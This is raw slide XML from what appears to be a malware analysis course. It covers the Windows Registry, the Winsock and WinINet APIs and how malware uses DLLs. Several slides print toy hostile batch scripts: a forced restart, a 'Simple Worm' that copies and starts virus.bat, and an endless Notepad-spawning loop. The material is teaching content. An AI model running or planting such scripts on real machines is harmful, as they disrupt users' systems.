          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="49803"/>
            </a:schemeClr>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GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt; log off the computer</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>shutdown -r</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4469063"/>
            <a:ext cx="5292080" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E5DFE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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt; Simple Worm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>copy C:\Malwares\virus.bat C:\Malwares</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>start C:\Malwares\virus.bat</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Google Shape;177;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418426" y="3843406"/>
            <a:ext cx="4726743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="97B4E4"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="BFCFEC"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="E0E8F4"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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CreateObject(“SAPI.SpVoice”).Speak”I love YOU”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163044" y="5187692"/>
            <a:ext cx="4997450" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3B9FBA"/>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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;&gt;Endless Notepads</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>@ECHO off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:top</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>START %SystemRoot%\system32\notepad.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>GOTO top</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20"/>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Windows Registry (Code Example)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p120"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p120"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1234158"/>
            <a:ext cx="8614480" cy="5435202"/>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21"/>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p121"/>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Registry Scripting by </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>.reg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When a user double-clicks a .</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> file, it automatically modifies the registry by merging the information the file contains into the registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p121"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385756" y="3573016"/>
            <a:ext cx="6668138" cy="150322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22"/>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Networking API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p122"/>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Windows API functions for network communication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Berkeley compatible sockets: implemented in the Winsock libraries, primarily in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>ws2_32.dll</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1178" name="Google Shape;1178;p122"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2696164"/>
            <a:ext cx="7556300" cy="2880154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="229326" y="5661248"/>
            <a:ext cx="8729952" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">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2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>The WSAStartup function must be called before any other networking functions in order to allocate resources for the networking libraries. When looking for the start of network connections while debugging code, it is useful to set a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t>breakpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
                <a:cs typeface="Teko"/>
                <a:sym typeface="Teko"/>
              </a:rPr>
              <a:t> on WSAStartup, because the start of networking should follow shortly.</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23"/>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Networking API (Code Example)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p123"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p123"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="1196752"/>
            <a:ext cx="5040560" cy="550824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24"/>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Networking API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p124"/>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WinINet API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Higher-level API </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored in</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>Wininet.dll</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Implements protocols, such as HTTP and FTP, at the application layer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>InternetOpen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: is used to initialize a connection to the Internet.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>InternetOpenUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: is used to connect to a URL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>InternetReadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: read the data from a file downloaded from the Internet.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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25"/>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;p125"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A DLL is an executable file that does not run alone, but exports functions that can be used by other applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Malware writers use DLLs in three ways:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>To store malicious code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>By using Windows DLLs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>By using third-party DLLs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Basic DLL Structure: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DLLs use the PE file format, and only a single flag indicates that the file is a DLL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DLLs often have more exports and generally fewer imports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>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26"/>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DLL example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205" name="Google Shape;1205;p126"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1206" name="Google Shape;1206;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="107504" y="1412776"/>
            <a:ext cx="4464496" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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 myDLL.c</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#include &lt;stdio.h&gt;</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#include “myDLL.h"</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EXPORT void message(){</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printf("Hello World");</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="121064" y="3861048"/>
            <a:ext cx="4450936" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>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 myDLL.h</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#define EXPORT __declspec(dllexport)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EXPORT void message (void);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
